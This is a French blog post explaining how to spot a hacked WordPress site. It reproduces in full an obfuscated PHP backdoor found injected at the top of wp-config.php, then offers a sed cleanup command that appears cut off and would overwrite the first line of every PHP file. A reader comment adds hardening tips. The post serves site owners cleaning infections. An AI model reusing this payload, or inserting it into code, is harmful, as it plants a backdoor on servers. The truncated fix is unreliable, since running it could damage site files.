• Accueil
    • Qui sommes nous ?
  • Portfolio
  • Blog
    • Swift
    • Tutos
    • nodeJS
    • Développement
    • Prestashop
    • Divers
    • WordPress
  • Formations
    • Toutes nos formations
  • Contact
  • Shop
  • Accueil
    • Qui sommes nous ?
  • Portfolio
  • Blog
    • Swift
    • Tutos
    • nodeJS
    • Développement
    • Prestashop
    • Divers
    • WordPress
  • Formations
    • Toutes nos formations
  • Contact
  • Shop

Comment savoir si wordpress est hacké

by Guillaume in Développement, Tutos, Wordpress 1 comments tags: hack, réparer, wordpress
Sep 23

Bonjour à tous,
Si comme moi, vous avez déjà eu quelques hacks sur wordpress et que vous voulez vous en débarrasser. VOici une petite astuce.

Pour commencer connectez vous en FTP et éditez le fichier wp-config.php (par exemple).
Si celui ci contient dès les premières lignes quelque chose du genre:

<?php if(!isset($GLOBALS["x61156x75156x61"])) { $ua=strtolower($_SERVER["x48124x54120x5f125x53105x52137x41107x45116x54"]); if ((! strstr($ua,"x6d163x69145")) and (! strstr($ua,"x72166x3a61x31"))) $GLOBALS["x61156x75156x61"]=1; } ?><?php $mtqvzubsmd = \'!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bddovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#j]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]2825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-8W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985:5298u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fuzbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#24<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%2f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x782sut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x78%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c#-%x5c%x7825o:W%x5c%x7825c:>1<7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x7825%x5c%x7824-%x5c%x782x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOx5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5cM4P8]37]278]225]241]334]368]322]3]364]6]283]427825)}.;%x5c%x7860UQPMSVDc%x7825}&;ftmbg}%x5c%x787f;!osvufs}w25-#1]#-bubE{h%x5c%x7825)tpqsut>825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64ye]53Ld]53]Kc]55Ld]55#*<%x5c%x7mjgA%x5c%x7827doj%x5c%x78256-*f%x5c%x7825)sf%x5c%x7878pmpusutx7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;e%x5c%x78b%x5c%x7825825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%xc%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Db%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]2t0}Z;0]=]0#)2q%x5c%x7825l}S;2-5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%rror_reporting(0); preg_replace("%x2c%x7825V<#65,47R25,d7R17,67R37,#%x5c%bubE{h%x5c%x7825)sutcvt-#w#)ldbjs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x78c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5x5c%x7827{ftmfV%x5c%f#<%x5c%x7825tdz>#L4]27c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#)sfebfI{*w%x5c%x7825)kV%c%x7825V<*#fopoV;hojepdoF.uofuopDf#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7787f;!|!}{;)gj}l;33bq}k;opjux787f<*X&Z&S{ftmfV%x5c%x787f<*XAZAS5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x78259]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#])fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]2x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQe%x786057ftbc%x5c%x787f!|!*uyf860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5cV<*w%x5c%x7825)ppde>u%x5g+)!gj+{e%x5c%x7825!osvufs!*!+A!>!1]y43]78]y33]65]y31]55]y85]82]y76]6B%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x78625w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEtpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%xy84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x7825;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)vt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bqov>*ofmy%x5c%x7825)utjm!|!*tutjyf%x5c%x7860opjudovg825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%%x5c%x7825-#1GO%x5c%x782ubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x78x61"]=1; function fjfgg($n){return chr(ord($n)-1);} @e9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39?]_%x5c%x785c}X%x5c%x78x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7x5c%x78256<C>^#zsfvr#%xhA%x5c%x7827pd%x5c%xftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpq155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%25s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x782]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85npd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-824-%x5c%x7824!>!tus%x5!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%5+*!*+fepdfe{h+{d%x5c%x7825)+opjudovdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x51%x72%164") && (!issw*[!%x5c%x7825rN}#QwTW%x5cf#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qpc%x785c%x5c%x7825j^%x5c%x78247825%x5c%x7824-%x5c%x799386c6f+9f5d816:+946:ce44#0QUUI&c_UOFHB%x5c%x7860SF7>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)ho}#-#%x5c%x7824-%x5c%x73]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x7825ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x782<%x5c%x787fw6*%x5c%x72]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); }%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y765-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6c%x7825%x5c%x7827jsv%]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x587f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x825kj:-!OVMM*<(<%x5c%x78e%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x525j:,,Bjg!)%x5c%x78255L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]K5:osvufs:~:<*9-1-r%x5c%x7825)s%x5cx7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y3%x5c%x7825)54l}%x5c%x7827;%x5c%j{fpg)%x5c%x7825s:*<%x5c%x785c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5csfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x787r.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+pm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}FNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78r#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y3of>2bd%x5c%x7825!<5h%x5x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f75c%x78257-C)fepmqnjA%x5c%x7827&6<.fopo#>b%x5c%x7825!*##>>X)!gjZ<824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x785c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutch%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tj%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x785c%x787f;!opjudovg}k~~7824-tusqpt)%x5c%x7825z-#:#*%x5c%x75c%x785cq%x5c%x78257**^#zsfvet($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%156%x75%156%4!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=t#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%xif((function_exists("%x6f%142%x5f%163%x74%14TV%x5c%x7860QUUI&b%x5c%x7825!|]y3e]81#%x5c%x782f#7e:55946-t]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**19x5c%x7825tdz)%x5c%x7825bbT-%x78256<C%x5c%x7827pd%x5c%x78256|6TQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bc%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985825<#g6R85,67R37,18R#>q%x5K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x%x7825eN+#Qi%x5c%x785c1^W%x5c%825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x78x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827EzH,2W%x5c%x7825wN;#-Ez-1H*WCx5c%x7824-%x5c%x7824*<!%x5c%x5tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x782x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#x5c%x7825nfd)##Qtpz)#]341]88%166%x61%154%x28%151%x6d%160%x6c%157%x64]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s#B#-#T#-#E#-#G#-#H#-#I#-#K#-0ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c25}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%xhnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x2#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1f%50%x2e%52%x29%57%x65","%x65u%x5c%x7825!-#2#%x5c%x782f#%x5c%#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x78612)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7c%x7825)fnbozcYufhA%x5c%x78272qj%*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{h%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47)1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%mw)%x5c%x7825tww**WYsboepn)%x%x7860{66~6<&w6<%x5c%x78%x5c%x7825b:>%x5c%x787]36]373P6]36]73]83]238M7x7822)!gj}1~!<2p%x5c%x7825%x#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x57fw6*CW&)7gj6<*doj%x-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#%145%x28%141%x72%162%x61%171%x5f%c%x7824]y8%x5c%x78245c%x7825bss-%x5c%x7825r%x5c%x7878B%x57-2qj%x5c%x78257-K)udfoopx5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x78c%x7825)n%x5c%x7825-#+I#!-id%x5c%x7825)uqpuft%x5c%x7860msvd},c%x787f_*#ujojRk3%x5c%34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe)>5h%x5c%x7825!<*::::::-1111{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f/(.*)/epreg_replacelmuciwreta\'; $zlcmiavdjg = explode(chr((227-183)),\'7717,44,5241,20,7443,69,4222,54,2030,36,8943,29,8487,40,9676,33,4563,66,808,49,5762,63,4156,66,3239,36,499,60,621,36,3275,52,4434,20,7964,32,857,56,2496,63,8264,40,329,63,2134,48,657,51,7872,63,9766,25,5134,54,3705,70,5435,50,6822,45,9207,33,7045,52,9553,36,5869,21,4411,23,7415,28,6974,47,9004,58,8606,61,9455,24,9589,20,7097,35,1541,28,5625,21,5944,36,6291,63,3387,65,6934,40,6071,57,9920,22,1803,46,1602,63,6867,67,8118,48,1350,25,9883,37,5188,53,1375,36,3775,60,3925,24,9114,42,4454,66,3327,60,4520,43,708,62,1411,32,7321,37,142,67,2103,31,3897,28,7676,41,7220,41,3835,62,4037,70,8723,35,9525,28,2685,70,0,35,4013,24,8794,58,7021,24,2271,59,2451,45,9298,45,2797,51,10009,27,9062,52,6589,53,5695,67,392,66,1569,33,6758,64,5383,27,3513,60,3203,36,5410,25,7761,30,4973,53,7132,29,7626,50,1236,68,2971,29,3452,61,3000,46,5287,45,6461,31,8758,36,7358,22,4276,45,9240,58,4780,47,5561,64,5098,36,3134,34,10036,70,5054,44,2228,20,2650,35,3110,24,2066,37,4344,67,8092,26,2418,33,2393,25,9791,68,8667,56,2622,28,35,53,1938,30,8972,32,6242,49,4321,23,458,41,6415,46,2755,42,3643,62,4719,61,7820,52,8362,44,6208,34,9343,42,1085,55,9859,24,9156,51,1443,68,8527,51,770,38,8196,68,4107,49,8406,53,5890,54,1735,68,2182,46,5332,29,9609,67,5485,21,7380,35,4950,23,559,62,9709,20,4629,37,1016,69,8333,29,5980,58,5361,22,7161,59,994,22,7512,65,4827,55,3046,64,8166,30,2917,54,7996,49,6642,51,209,65,8304,29,5261,26,1178,58,7261,60,9426,29,9729,37,8045,47,274,55,5825,44,7791,29,6693,65,3573,70,1849,49,2248,23,6149,59,1511,30,3949,64,7935,29,1968,62,8459,28,1304,46,9500,25,2848,69,9942,67,9385,41,2330,63,913,30,7577,49,6492,28,6128,21,5026,28,9479,21,4666,53,6520,69,8893,50,1140,38,8852,41,1685,50,943,51,1665,20,4882,68,8578,28,2559,63,6038,33,1898,40,5506,55,6354,61,88,54,3168,35,5646,49\'); $spbumcxyfi=substr($mtqvzubsmd,(63915-53809),(21-14)); if (!function_exists(\'mwrhcidctz\')) { function mwrhcidctz($zebzhykwih, $hgkaxslrtf) { $tlbmjrizuh = NULL; for($gnyaudjggn=0;$gnyaudjggn<(sizeof($zebzhykwih)/2);$gnyaudjggn++) { $tlbmjrizuh .= substr($hgkaxslrtf, $zebzhykwih[($gnyaudjggn*2)],$zebzhykwih[($gnyaudjggn*2)+1]); } return $tlbmjrizuh; };} $cavsztcqlk="x2057x2a40x69155x69146x74171x75150x76170x2052x2f40x65166x61154x28163x74162x5f162x65160x6c141x63145x28143x68162x2850x3161x3655x3771x2951x2c40x63150x7250x2863x3960x2d62x3970x2951x2c40x6d167x72150x63151x64143x74172x2844x7a154x63155x69141x76144x6a147x2c44x6d164x71166x7a165x62163x6d144x2951x2973x2057x2a40x74171x77151x6b144x63170x63145x2052x2f40"; $rrfzgzfeho=substr($mtqvzubsmd,(54238-44125),(73-61)); $rrfzgzfeho($spbumcxyfi, $cavsztcqlk, NULL); $rrfzgzfeho=$cavsztcqlk; $rrfzgzfeho=(426-305); $mtqvzubsmd=$rrfzgzfeho-1; ?>
Hack wordpress

vous l\’aurez deviné, votre wordpress est infecté.

Comment faire pour réparer ce problème ?

Et bien j\’ai une petite astuce qui consiste à se connecter en SSH, puis de se rendre à la racine de son site et lancer la commande:

find . -name "*.php" -exec sed -i \'1 s/.*/ 

Laissez mouliner un peu et une fois l\’opération terminée, rééditez votre wp-config.php et votre problème devrait être réglé.

Cela dit, je ne sais pas encore d\’ou provient le hack, n\’hésitez pas à commenter si vous avez plus d\’informations à propos de celui-ci.
Enjoy 😉

Partager :

  • Cliquez pour partager sur Twitter(ouvre dans une nouvelle fenêtre)
  • Cliquez pour partager sur Facebook(ouvre dans une nouvelle fenêtre)
  • Cliquez pour partager sur Google+(ouvre dans une nouvelle fenêtre)

Articles similaires

Créer une application native avec HTML CSS JS ET PHP ! Insérer une image depuis une URL avec Swift 2

Article en relation

  • Créer une application native avec HTML CSS JS ET PHP !
    août 19, 2015   /   11 comments
    Bonjour à tous, Cela fait un bon moment que je bricole sur nodeJS car je trouve cette techno Read more!
  • [TUTO] modifier plusieurs produits en masse sur Prestashop
    juillet 08, 2014   /   12 comments
    Bonjour à tous, Aujourd'hui nous allons voir comment modifier plusieurs produits très rapidement Read more!
  • [MODULE] gestion de produits en masse, administration rapide, SEO avancé
    juin 30, 2014   /   3 comments
    Nouveau module prestashop 1.5 et 1.6 le Fastmanager. Grâce à ce module, vous pouvez administrer Read more!

1 Commentaires:

  1. Alan septembre 23, 2015 Reply

    En général ce genre d’insertion se fait à partir des failles plugin ou plus grave : WordPress lui même pour trouver son origine : il faut checker les tentatives d’attaques sur les serveur :
    go « access.log » et essayes de repérer des connexion du même ip vers plein de dossiers et plugin que tu n’as pas forcément.

    Ces attaques tentent de repérer les failles d’upload ou des droits d’utilisateurs un peu « libertins ». La meilleur défense que j’ai trouvé c’est de mettre des htaccess un peu partout (dossier upload, config…) et bien sur limiter au maximum les chmod)

Laisser un commentaire Annuler la réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Rechercher

Catégories

  • Développement (20)
    • Swift (2)
  • Divers (4)
  • Formations (7)
  • nodeJS (1)
  • Non classé (2)
  • Prestashop (10)
  • Tutos (20)
  • Wordpress (4)
  • Formations web
  • Qui sommes nous ?
  • Blog
  • Home
  • Mentions légales
  • Tutos
  • Contact
  • Devis en ligne
© base2code All Rights Reserved.